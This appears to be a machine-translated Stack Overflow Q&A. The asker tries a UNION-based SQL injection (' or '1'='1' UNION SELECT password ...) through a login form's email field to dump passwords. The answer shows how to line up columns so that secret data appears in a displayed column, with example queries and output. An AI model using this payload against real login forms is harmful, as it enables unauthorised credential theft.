Select union未返回预期的列
Select union未返回预期的列
提问于 2019-03-04 03:00:28
我执行此sql查询是为了返回具有另一个名称的password列。
SELECT * FROM
login
where email = '1' or '1' = '1'
union
select password as foo, null as col, null as col,
null as col, null as col, null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col,
null as col,null as col,null as col
from login此查询不返回任何foo列。有什么问题吗?
编辑:我想通过电子邮件注入一个表格。我想打印密码为"foo“替换(post) "Select * from login where email = $POST”
回答 1
Stack Overflow用户
发布于 2019-03-04 03:05:11
这是因为您正在执行SELECT * ... UNION,因此不能在联合中重新定义别名。
模式(MySQL v5.7)
create table test
(
id int,
datas varchar(255)
);
INSERT INTO test VALUES (1, "foo"), (2, "bar");查询#1
SELECT *
FROM test
UNION
SELECT id AS toto, -- toto alias won't be used, the col name was defined in select *
NULL AS lol -- same than above
FROM test;输出检查字段名称
| id | datas |
| --- | ----- |
| 1 | foo |
| 2 | bar |
| 1 | |
| 2 | |由于不能重命名UNION中的列,因此仍然可以猜测列的顺序,并尝试在正确的位置获取数据(在显示的位置获取秘密数据)
模式(MySQL v5.7)
create table test
(
id int,
DisplayedDatas varchar(255),
SecretDatas varchar(255)
);
INSERT INTO test VALUES (1, "foo", "password1"), (2, "bar", "password2");查询#1
SELECT *
FROM test
WHERE DisplayedDatas = '1' or '1' = '1'
UNION
SELECT NULL, SecretDatas, NULL
FROM test;输出
| id | DisplayedDatas | SecretDatas |
| --- | -------------- | ----------- |
| 1 | foo | password1 |
| 2 | bar | password2 |
| | password1 | |
| | password2 | |页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/54972546
复制相关文章
相似问题
腾讯云开发者
